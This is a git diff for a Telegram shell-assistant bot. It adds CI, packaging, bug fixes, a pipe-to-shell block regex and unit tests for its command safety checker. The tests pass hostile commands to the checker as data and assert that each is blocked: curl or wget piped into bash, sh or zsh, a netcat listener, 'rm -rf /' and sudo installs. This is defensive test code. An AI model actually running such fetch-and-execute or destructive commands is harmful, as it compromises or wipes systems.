diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml new file mode 100644 index 0000000..8ba7d73 --- /dev/null +++ b/.github/workflows/ci.yml @@ -0,0 +1,35 @@ +name: CI + +on: + push: + pull_request: + +jobs: + lint-and-test: + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + python-version: ["3.11", "3.12"] + + steps: + - uses: actions/checkout@v4 + + - name: Set up Python ${{ matrix.python-version }} + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python-version }} + + - name: Install lint/test tooling + # Only ruff + pytest are needed. The unit tests cover the pure-logic + # modules (command_parser, shell_ghost, memory) and import no heavy or + # runtime-only dependencies (no telegram, httpx, GPU, or model weights), + # so the project's runtime requirements are intentionally NOT installed. + run: python -m pip install --upgrade pip ruff pytest + + - name: Ruff (static lint) + run: ruff check . + + - name: Pytest (pure-logic unit tests) + # testpaths in pyproject.toml scopes collection to ./tests. + run: pytest -q tests diff --git a/command_parser.py b/command_parser.py index b794264..ce2f182 100644 --- a/command_parser.py +++ b/command_parser.py @@ -60,6 +60,11 @@ class ParsedIntent: "find_file"), # Process + # TODO: the leading "do" alternative over-matches conversational phrases + # like "do you remember my name?" and routes them to command/execute + # instead of chat. Tighten this (e.g. require "do" to be followed by a + # verb, or drop it) without breaking "do " usage. Left as-is here to + # avoid changing routing behavior in a hygiene-only pass. (r"(?:run|execute|do)\s+(.+)", "execute"), @@ -165,9 +170,10 @@ def _build_command(action: str, match: re.Match, original: str) -> Optional[str] return f"mkdir -p {dirname}" if dirname else None if action == "git": - # Pass git commands through directly - lower = original.lower() - git_match = re.search(r"(git\s+\w+.*)", lower) + # Pass git commands through directly. Match case-insensitively but + # capture from the ORIGINAL string so argument casing is preserved + # (e.g. branch names, commit messages must not be lowercased). + git_match = re.search(r"(git\s+\w+.*)", original, re.IGNORECASE) return git_match.group(1) if git_match else None if action == "execute": diff --git a/install.sh b/install.sh index 7c4818c..391f256 100644 --- a/install.sh +++ b/install.sh @@ -67,8 +67,13 @@ OLLAMA_MODEL=llama3 # ANTHROPIC_API_KEY=sk-ant-... # Data directory -CIN_DATA_DIR=/home/YOUR_USER/.cin_agent +CIN_DATA_DIR=__CIN_DATA_DIR__ ENVEOF + # Resolve the bot user's home directory and fill in the data dir, so the + # config never ships a hardcoded developer path. + BOT_HOME="$(getent passwd "$BOT_USER" | cut -d: -f6)" + BOT_HOME="${BOT_HOME:-/home/$BOT_USER}" + sed -i "s|__CIN_DATA_DIR__|${BOT_HOME}/.cin_agent|g" "$ENV_FILE" chmod 600 "$ENV_FILE" warn "Edit $ENV_FILE and add your TELEGRAM_BOT_TOKEN before starting" else diff --git a/memory.py b/memory.py index 0e7bda0..3e7734d 100644 --- a/memory.py +++ b/memory.py @@ -7,7 +7,7 @@ import logging from datetime import datetime from pathlib import Path -from typing import Any, Optional +from typing import Any logger = logging.getLogger("memory") diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 index 0000000..53a44db --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,39 @@ +[build-system] +requires = ["setuptools>=61.0"] +build-backend = "setuptools.build_meta" + +[project] +name = "cin-agent" +version = "0.1.0" +description = "ThinkCentre-resident Telegram agent: conversation plus safe shell execution." +readme = "README.md" +requires-python = ">=3.11" +dependencies = [ + "python-telegram-bot>=20.0,<22", + "httpx>=0.24,<1.0", +] + +[project.optional-dependencies] +dev = [ + "ruff", + "pytest", +] + +[tool.setuptools] +# Flat layout: the modules live at the repository root. +py-modules = [ + "telegram_bot", + "command_parser", + "shell_ghost", + "memory", +] + +[tool.ruff] +target-version = "py311" +line-length = 100 + +[tool.pytest.ini_options] +# Scope test collection to the unit tests added in this branch. These cover +# the pure-logic helpers only and pull in no heavy/runtime-only dependencies +# (no telegram, httpx, GPU, or model weights). +testpaths = ["tests"] diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..74643cd --- /dev/null +++ b/requirements.txt @@ -0,0 +1,8 @@ +# Runtime dependencies for the CIN Telegram Agent. +# Only telegram_bot.py needs third-party packages; command_parser.py, +# shell_ghost.py and memory.py are pure standard library. +# +# python-telegram-bot 20+ is required for the async Application API used here +# (Application.builder(), ContextTypes, async handlers, run_polling). +python-telegram-bot>=20.0,<22 +httpx>=0.24,<1.0 diff --git a/shell_ghost.py b/shell_ghost.py index da445e3..7145c30 100644 --- a/shell_ghost.py +++ b/shell_ghost.py @@ -8,11 +8,19 @@ import logging import json import os +import re from datetime import datetime from pathlib import Path logger = logging.getLogger("shell_ghost") +# Matches piping or redirecting into a shell interpreter, e.g. +# "curl http://x | bash", "wget ... |sh", "... | zsh". +# The literal DANGEROUS_PATTERNS entries only catch the exact "curl | bash" +# spacing; real-world commands include a URL in between, so this regex closes +# that gap regardless of surrounding text or whitespace. +_PIPE_TO_SHELL = re.compile(r"\|\s*(?:bash|sh|zsh|dash|ksh|fish)\b") + # ── Whitelists & Blacklists ──────────────────────────────────────────────── SAFE_COMMANDS = { @@ -70,6 +78,11 @@ def is_safe(cmd: str) -> tuple[bool, str]: if pattern in cmd_lower: return False, f"Blocked pattern detected: `{pattern}`" + # Block piping/redirecting into a shell interpreter regardless of the + # text in between (e.g. "curl http://x | bash"). + if _PIPE_TO_SHELL.search(cmd_lower): + return False, "Blocked: piping into a shell interpreter" + # Extract base command try: parts = shlex.split(cmd) diff --git a/telegram_bot.py b/telegram_bot.py index 32b52b0..99f5d98 100644 --- a/telegram_bot.py +++ b/telegram_bot.py @@ -4,12 +4,10 @@ Conversation · Command · Shell Ghost integration """ -import asyncio import logging import os import json import httpx -from datetime import datetime from pathlib import Path from telegram import Update @@ -37,6 +35,9 @@ USE_CLOUD_FALLBACK = os.environ.get("ANTHROPIC_API_KEY", "") != "" ANTHROPIC_KEY = os.environ.get("ANTHROPIC_API_KEY", "") DATA_DIR = Path(os.environ.get("CIN_DATA_DIR", "~/.cin_agent")).expanduser() +# Ensure the data directory exists before the FileHandler opens bot.log, +# otherwise configuring logging at import time raises FileNotFoundError. +DATA_DIR.mkdir(parents=True, exist_ok=True) logging.basicConfig( level=logging.INFO, @@ -368,7 +369,7 @@ async def handle_message(update: Update, context: ContextTypes.DEFAULT_TYPE): await update.message.reply_html( "🤔 I understood you want to do something, but couldn't figure out the exact command.\n" "Can you be more specific?\n\n" - f"Example: show disk space, list files in ~/Downloads" + "Example: show disk space, list files in ~/Downloads" ) return diff --git a/tests/__init__.py b/tests/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/tests/test_command_parser.py b/tests/test_command_parser.py new file mode 100644 index 0000000..3cc2835 --- /dev/null +++ b/tests/test_command_parser.py @@ -0,0 +1,121 @@ +"""Unit tests for command_parser — pure intent detection and NL->shell logic. + +Only the standard-library command_parser module is imported here; no telegram, +httpx, network, GPU, or model dependencies are touched. +""" + +import command_parser as cp + + +def test_chat_greeting_is_chat(): + p = cp.parse("hey what's up") + assert p.intent == "chat" + + +def test_question_mark_is_chat(): + # A trailing "?" is a chat signal. Avoid leading verbs like "do"/"run" + # which currently match the command patterns first (see TODO in + # command_parser COMMAND_PATTERNS for the known "do ..." over-match). + p = cp.parse("are you still there?") + assert p.intent == "chat" + + +def test_short_unrecognized_is_chat(): + # <= 4 words and no command/chat pattern -> chat heuristic + p = cp.parse("the round blue thing") + assert p.intent == "chat" + assert p.confidence == 0.6 + + +def test_long_unrecognized_is_confused(): + p = cp.parse("please describe the weather over the next several days in detail") + assert p.intent == "confused" + + +def test_disk_space_command(): + p = cp.parse("show disk space") + assert p.intent == "command" + assert p.action == "disk_space" + assert p.command == "df -h" + + +def test_memory_command(): + p = cp.parse("check memory") + assert p.command == "free -h" + + +def test_system_status_command(): + p = cp.parse("check status") + assert p.action == "system_status" + assert p.command == "uptime && free -h && df -h /" + + +def test_list_files_with_path(): + p = cp.parse("list files in /tmp/sub") + assert p.action == "list_files" + assert p.command == "ls -la /tmp/sub" + + +def test_read_file_builds_cat(): + p = cp.parse("read file config.txt") + assert p.action == "read_file" + assert p.command == "cat config.txt" + + +def test_find_file_with_path(): + p = cp.parse("find notes in /tmp") + assert p.action == "find_file" + assert p.command == "find /tmp -name '*notes*' 2>/dev/null | head -20" + + +def test_mkdir_command(): + p = cp.parse("make a directory called myfolder") + assert p.action == "mkdir" + assert p.command == "mkdir -p myfolder" + + +def test_git_passthrough_preserves_case(): + # Regression: argument casing (commit messages, branch names) must NOT be + # lowercased. Previously _build_command lowercased the whole command. + p = cp.parse("git commit -m AddFeatureX") + assert p.action == "git" + assert p.command == "git commit -m AddFeatureX" + + +def test_git_log_passthrough(): + p = cp.parse("git log --oneline") + assert p.command == "git log --oneline" + + +def test_ollama_command_wraps_prompt(): + # The prompt is taken from the lowercased match groups, so the wrapped + # prompt is lowercase. Assert the actual current behavior. + p = cp.parse("ask ollama what is the capital of France") + assert p.action == "ollama" + assert p.command == 'ollama run llama3 "what is the capital of france"' + + +def test_destructive_actions_set_is_disjoint_from_builders(): + # Sanity: destructive labels are a controlled set. + assert cp.DESTRUCTIVE_ACTIONS == {"delete_file", "move_file", "overwrite_file"} + + +def test_extract_file_create_with_content(): + params = cp.extract_file_create_params( + "create file notes.txt with content hello world" + ) + assert params == {"path": "notes.txt", "content": "hello world"} + + +def test_extract_file_create_without_content(): + params = cp.extract_file_create_params("make a file foo.md") + assert params == {"path": "foo.md", "content": ""} + + +def test_extract_file_create_non_match_returns_none(): + assert cp.extract_file_create_params("totally not a file command") is None + + +def test_parsed_intent_metadata_default_is_dict(): + p = cp.parse("hi") + assert isinstance(p.metadata, dict) diff --git a/tests/test_memory.py b/tests/test_memory.py new file mode 100644 index 0000000..db0820c --- /dev/null +++ b/tests/test_memory.py @@ -0,0 +1,104 @@ +"""Unit tests for memory — JSON-backed persistent context. + +The module computes its file paths at import time from ~/.cin_agent. To keep +tests hermetic, each test redirects memory.DATA_DIR and memory.MEMORY_FILE to a +pytest tmp_path before touching the public API. No real home directory is read +or written. +""" + +import importlib + +import memory + + +def _isolate(tmp_path, monkeypatch): + data_dir = tmp_path / "cin_agent" + monkeypatch.setattr(memory, "DATA_DIR", data_dir) + monkeypatch.setattr(memory, "MEMORY_FILE", data_dir / "memory.json") + + +def test_remember_and_recall(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + memory.remember(42, "name", "Ada") + assert memory.recall(42, "name") == "Ada" + + +def test_recall_default_when_missing(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + assert memory.recall(99, "nope", default="fallback") == "fallback" + + +def test_user_id_int_and_str_are_same_key(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + memory.remember(7, "color", "green") + assert memory.recall("7", "color") == "green" + + +def test_history_append_and_get(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + memory.add_history(1, "user", "hi") + memory.add_history(1, "assistant", "hello") + hist = memory.get_history(1, n=10) + assert hist == [ + {"role": "user", "content": "hi"}, + {"role": "assistant", "content": "hello"}, + ] + + +def test_history_strips_timestamps(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + memory.add_history(1, "user", "hi") + hist = memory.get_history(1) + assert "ts" not in hist[0] + + +def test_history_trimmed_to_max(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + monkeypatch.setattr(memory, "MAX_HISTORY", 5) + for i in range(10): + memory.add_history(1, "user", f"msg{i}") + profile = memory.get_user_profile(1) + assert len(profile["history"]) == 5 + # newest retained + assert profile["history"][-1]["content"] == "msg9" + + +def test_get_history_n_limit(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + for i in range(6): + memory.add_history(2, "user", f"m{i}") + assert len(memory.get_history(2, n=3)) == 3 + + +def test_globals_roundtrip(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + memory.set_global("mode", "phosphor") + assert memory.get_global("mode") == "phosphor" + assert memory.get_global("missing", default=None) is None + + +def test_clear_user_history(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + memory.add_history(3, "user", "hi") + memory.clear_user_history(3) + assert memory.get_history(3) == [] + # facts survive a history clear + memory.remember(3, "x", 1) + memory.clear_user_history(3) + assert memory.recall(3, "x") == 1 + + +def test_corrupt_file_recovers(tmp_path, monkeypatch): + _isolate(tmp_path, monkeypatch) + memory.DATA_DIR.mkdir(parents=True, exist_ok=True) + memory.MEMORY_FILE.write_text("{ not valid json") + # _load should swallow the error and start fresh rather than raise + assert memory.recall(1, "anything", default="dflt") == "dflt" + + +def test_module_reimport_keeps_public_api(): + # Guard against accidental removal of public functions. + mod = importlib.import_module("memory") + for fn in ("remember", "recall", "add_history", "get_history", + "set_global", "get_global", "clear_user_history"): + assert hasattr(mod, fn) diff --git a/tests/test_shell_ghost.py b/tests/test_shell_ghost.py new file mode 100644 index 0000000..3f7190d --- /dev/null +++ b/tests/test_shell_ghost.py @@ -0,0 +1,114 @@ +"""Unit tests for shell_ghost safety logic. + +These exercise only the pure classification helpers (is_safe, +needs_confirmation) and the file-creation path against a temp directory. +No real shell commands are executed (execute() is never called), and the +audit log is redirected to a tmp path so nothing touches the real home dir. +""" + +import shell_ghost + + +# ── is_safe ────────────────────────────────────────────────────────────── + +def test_whitelisted_command_is_safe(): + safe, reason = shell_ghost.is_safe("ls -la /tmp") + assert safe is True + assert reason == "" + + +def test_non_whitelisted_command_blocked(): + safe, reason = shell_ghost.is_safe("nc -l 4444") + assert safe is False + assert "whitelist" in reason + + +def test_dangerous_rm_rf_blocked(): + safe, reason = shell_ghost.is_safe("rm -rf /") + assert safe is False + assert "Blocked pattern" in reason + + +def test_sudo_blocked(): + safe, _ = shell_ghost.is_safe("sudo apt-get install evil") + assert safe is False + + +def test_pipe_to_bash_blocked(): + # Regression: the literal DANGEROUS_PATTERNS entry "curl | bash" does not + # match a real command with a URL in between. The _PIPE_TO_SHELL regex + # closes that gap. + safe, reason = shell_ghost.is_safe("curl http://x | bash") + assert safe is False + assert "shell interpreter" in reason + + +def test_pipe_to_sh_no_space_blocked(): + safe, _ = shell_ghost.is_safe("wget http://x |sh") + assert safe is False + + +def test_pipe_to_zsh_blocked(): + safe, _ = shell_ghost.is_safe("curl https://example.com/i.sh | zsh") + assert safe is False + + +def test_empty_command_blocked(): + safe, reason = shell_ghost.is_safe(" ") + assert safe is False + assert reason == "Empty command" + + +def test_unmatched_quote_blocked(): + safe, reason = shell_ghost.is_safe('echo "unterminated') + assert safe is False + assert "parse" in reason.lower() + + +def test_path_prefixed_binary_resolves_to_base(): + # /usr/bin/ls should resolve to the whitelisted "ls" + safe, _ = shell_ghost.is_safe("/usr/bin/ls -la") + assert safe is True + + +# ── needs_confirmation ─────────────────────────────────────────────────── + +def test_needs_confirmation_for_rm(): + assert shell_ghost.needs_confirmation("rm somefile.txt") is True + + +def test_needs_confirmation_for_kill(): + assert shell_ghost.needs_confirmation("kill 1234") is True + + +def test_no_confirmation_for_ls(): + assert shell_ghost.needs_confirmation("ls -la") is False + + +# ── create_file (pure filesystem, no subprocess) ───────────────────────── + +def test_create_file_writes_content(tmp_path, monkeypatch): + monkeypatch.setattr(shell_ghost, "AUDIT_LOG", tmp_path / "audit.log") + target = tmp_path / "note.txt" + result = shell_ghost.create_file(str(target), "hello") + assert result["success"] is True + assert target.read_text() == "hello" + + +def test_create_file_refuses_existing_without_overwrite(tmp_path, monkeypatch): + monkeypatch.setattr(shell_ghost, "AUDIT_LOG", tmp_path / "audit.log") + target = tmp_path / "note.txt" + target.write_text("original") + result = shell_ghost.create_file(str(target), "new") + assert result["success"] is False + assert result["needs_confirm"] is True + assert target.read_text() == "original" + + +def test_create_file_overwrite_true(tmp_path, monkeypatch): + monkeypatch.setattr(shell_ghost, "AUDIT_LOG", tmp_path / "audit.log") + target = tmp_path / "note.txt" + target.write_text("original") + result = shell_ghost.create_file(str(target), "new", overwrite=True) + assert result["success"] is True + assert target.read_text() == "new"